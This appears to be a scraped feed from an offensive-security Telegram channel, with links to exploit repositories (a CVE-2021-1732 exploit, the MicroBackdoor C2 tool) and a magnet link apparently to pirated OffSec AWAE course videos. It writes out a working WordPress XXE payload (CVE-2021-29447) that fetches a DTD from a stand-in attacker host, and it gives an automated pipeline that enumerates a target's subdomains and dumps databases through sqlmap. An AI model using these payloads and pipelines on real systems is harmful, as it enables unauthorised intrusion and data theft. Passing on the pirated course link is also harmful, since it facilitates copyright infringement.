This media is not supported in your browser
VIEW IN TELEGRAM
Our latest blog post explores vulnerabilities and possible Apple copyright violations in Cellebrite's software:
"Exploiting vulnerabilities in Cellebrite UFED and Physical Analyzer from an app's perspective"
-signal
"Exploiting vulnerabilities in Cellebrite UFED and Physical Analyzer from an app's perspective"
-signal
GitHub - lennartkoopmann/nzyme: Nzyme is a free and open next-generation WiFi defense system. Go to www.nzyme.org for more information.
https://github.com/lennartkoopmann/nzyme#getting-started
https://github.com/lennartkoopmann/nzyme#getting-started
GitHub
GitHub - nzymedefense/nzyme: Network Defense System.
Network Defense System. Contribute to nzymedefense/nzyme development by creating an account on GitHub.
GitHub - Pai-Po/CVE-2021-1732: CVE-2021-1732 poc & exp; tested on 20H2
https://github.com/Pai-Po/CVE-2021-1732
https://github.com/Pai-Po/CVE-2021-1732
GitHub
GitHub - Pai-Po/CVE-2021-1732: CVE-2021-1732 poc & exp; tested on 20H2
CVE-2021-1732 poc & exp; tested on 20H2. Contribute to Pai-Po/CVE-2021-1732 development by creating an account on GitHub.
Advanced Web Attacks and Exploatation 2020
about
https://www.offensive-security.com/offsec/awae-2020-update/
https://www.exploit-db.com/advanced-web-attacks
magnet:?xt=urn:btih:2ED593EA8EEA4AC9A39B30B07A7C45E788D78068&dn=AWAE%20Video%202020&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337%2fannounce
about
https://www.offensive-security.com/offsec/awae-2020-update/
https://www.exploit-db.com/advanced-web-attacks
magnet:?xt=urn:btih:2ED593EA8EEA4AC9A39B30B07A7C45E788D78068&dn=AWAE%20Video%202020&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337%2fannounce
OffSec
AWAE: Updated with More Content for 2020 | OffSec
The Advanced Web Attacks and Exploitation (AWAE) course has been updated for 2020. Learn what changed, why we did it, and how it will help you.
Now might be a good time to make sure you have local copies of all the offensive security tools on GitHub
CVE-2021-29447 #WordPress XXE: you don't need a wave file to set iXML metadata! bash:
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://attacker/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://attacker/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
find sql injection
subfinder -d target | tee -a domains
cat domain | httpx | tee -a alive.txt
cat alive.txt | waybackurls | tee -a urls
gf sqli urls >> sqli
sqlmap -m sqli --dbs --batch
happy hacking
subfinder -d target | tee -a domains
cat domain | httpx | tee -a alive.txt
cat alive.txt | waybackurls | tee -a urls
gf sqli urls >> sqli
sqlmap -m sqli --dbs --batch
happy hacking
GitHub - Cr4sh/MicroBackdoor: Small and convenient C2 tool for Windows targets
https://github.com/Cr4sh/MicroBackdoor
https://github.com/Cr4sh/MicroBackdoor
GitHub
GitHub - Cr4sh/MicroBackdoor: Small and convenient C2 tool for Windows targets
Small and convenient C2 tool for Windows targets. Contribute to Cr4sh/MicroBackdoor development by creating an account on GitHub.